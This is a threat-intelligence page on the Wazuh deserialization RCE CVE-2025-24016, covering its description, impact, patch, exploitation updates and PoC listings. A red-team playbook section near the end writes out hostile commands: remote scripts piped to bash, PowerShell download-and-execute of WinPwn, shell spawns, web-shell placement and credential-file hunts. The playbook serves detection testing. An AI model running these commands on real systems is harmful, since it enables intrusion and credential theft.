CVE-2025-24016
Overview
This vulnerability is an unsafe deserialization flaw in the Wazuh DistributedAPI component, specifically within the function as_wazuh_object located in framework/wazuh/core/cluster/common.py. The root cause lies in the deserialization of JSON-serialized parameters without proper input sanitization, allowing injection of malicious dictionary objects. The flaw affects Wazuh server versions from 4.4.0 up to but not including 4.9.1, within the cluster communication mechanism.
Vulnerability Description
Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.
Impact
An attacker with at least low-privileged API access can execute arbitrary Python code on the Wazuh server, leading to full system compromise. This includes unauthorized data access, lateral movement within the cluster, and potential denial of service. The vulnerability can be exploited via compromised dashboards, cluster nodes, or in some configurations, even compromised agents, enabling attackers to escalate privileges and maintain persistence across the network.
Solution
Upgrade Wazuh to version 4.9.1 or later, where this unsafe deserialization vulnerability is fixed. Refer to the official Wazuh security advisory (https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh) for detailed patching instructions and version-specific remediation steps. No workarounds are documented; applying the vendor patch is required to fully mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Wazuh, a widely used open-source platform for threat prevention, detection, and response, stems from an unsafe deserialization process that allows for remote code execution. This issue arises in versions 4.4.0 through 4.9.1, where the DistributedAPI parameters are serialized as JSON and subsequently deserialized using the `as_wazuh_object` function. The core of the problem lies in the potential for an attacker to inject an unsanitized dictionary into the DAPI request or response. By doing so, they can trigger an unhandled exception, which can be exploited to execute arbitrary Python code on the Wazuh server. This vulnerability is particularly severe due to its ability to be exploited by any user with API access, including those who may have compromised dashboards or servers within the Wazuh cluster.
The attack vectors associated with this vulnerability are diverse and can be executed through various means. An attacker could leverage compromised API credentials to send malicious requests directly to the Wazuh server, thereby injecting harmful payloads into the deserialization process. Additionally, in certain configurations, even a compromised agent within the Wazuh environment could initiate an attack. This broad attack surface significantly increases the risk, as it allows for exploitation by both external adversaries and internal threats. The ability to execute arbitrary code remotely could lead to a complete takeover of the Wazuh server, enabling attackers to manipulate security configurations, exfiltrate sensitive data, or pivot to other systems within the network.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Wazuh for their security monitoring and incident response. A successful exploitation could lead to unauthorized access to critical security data, disruption of security operations, and potential compliance violations, especially for organizations subject to data protection regulations. The business risks associated with such an incident include reputational damage, financial losses due to remediation efforts, and potential legal ramifications stemming from data breaches. Furthermore, the ability to execute arbitrary code could allow attackers to deploy additional malware or ransomware, exacerbating the situation and leading to further financial and operational consequences.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to version 4.9.1 or later, where the issue has been addressed. Regularly updating software to the latest versions is a fundamental best practice in cybersecurity. Additionally, implementing robust access controls to limit API access to trusted users and systems can help reduce the attack surface. Monitoring API traffic for unusual patterns or unauthorized requests can also serve as an early warning system for potential exploitation attempts. Employing application security measures, such as input validation and sanitization, can further bolster defenses against deserialization attacks. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the unsafe deserialization vulnerability in Wazuh presents a significant threat to organizations utilizing this platform for security management. The potential for remote code execution, coupled with the ease of exploitation, underscores the need for immediate attention and remediation. By adopting a proactive security posture that includes timely updates, stringent access controls, and continuous monitoring, organizations can mitigate the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the unsafe deserialization vulnerability in Wazuh servers. This increase in activity coincides with the recent addition of CVE-2025-24016 to the Known Exploited Vulnerabilities (KEV) catalog, signaling heightened attacker interest and potential prioritization in exploitation campaigns. Although the Exploit Prediction Scoring System (EPSS) score shows a slight decline, the surge in observed exploitation attempts and the proliferation of publicly available proof-of-concept exploits amplify the operational risk for organizations running vulnerable Wazuh versions. This evolving landscape underscores an elevated threat level, as adversaries are actively leveraging multiple publicly accessible tools to achieve remote code execution, increasing the likelihood of successful compromise. Defenders should recognize this shift as a critical escalation in the threat environment surrounding Wazuh deployments.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2025-24016 vulnerability in Wazuh servers. This increase aligns with the continued proliferation of publicly available proof-of-concept exploits, which have grown in both number and community engagement. Our telemetry indicates that adversaries are increasingly leveraging these tools to conduct remote code execution attacks, suggesting a shift from experimental to more operational use. Although the EPSS score remains stable, the qualitative surge in detection activity signals heightened attacker interest and capability. This evolving threat landscape elevates the risk for organizations running vulnerable Wazuh versions, as the window for exploitation widens and the likelihood of successful compromise intensifies. Defenders should interpret this trend as a critical escalation in adversary activity, underscoring the urgency of addressing this vulnerability within their environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wazuh | Wazuh | All |
cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Wazuh server remote code execution caused by an unsafe deserialization vulnerability.
exploits/linux/http/wazuh_auth_rce_cve_2025_24016
|
- | Unknown | unix, linux | View |
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xjessie21/CVE-2025-24016
CVE-2025-24016: Wazuh Unsafe Deserialization Remote Code Execution (RCE)
|
0xjessie21 | 43 | 6 | 2025-02-16 | View |
|
guinea-offensive-security/Wazuh-RCE
Wazuh 8.4 CVE-2025-24016
|
guinea-offensive-security | 8 | 2 | 2025-07-13 | View |
|
GloStarRx1/CVE-2025-24016
CVE-2025-24016: RCE in Wazuh server! Remote Code Execution
|
GloStarRx1 | 1 | 6 | 2025-02-21 | View |
|
MuhammadWaseem29/CVE-2025-24016
CVE-2025-24016: RCE in Wazuh server! Remote Code Execution
|
MuhammadWaseem29 | 5 | 0 | 2025-02-20 | View |
|
huseyinstif/CVE-2025-24016-Nuclei-Template
|
huseyinstif | 4 | 1 | 2025-02-13 | View |
|
cybersecplayground/CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager ...
|
cybersecplayground | 2 | 0 | 2025-04-21 | View |
|
rxerium/CVE-2025-24016
Detection for CVE-2025-24016 - Deserialization of Untrusted Data Vulnerability in the Wazuh software
|
rxerium | 2 | 0 | 2025-06-10 | View |
|
celsius026/poc_CVE-2025-24016
|
celsius026 | 0 | 0 | 2025-04-15 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-24016 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24016 |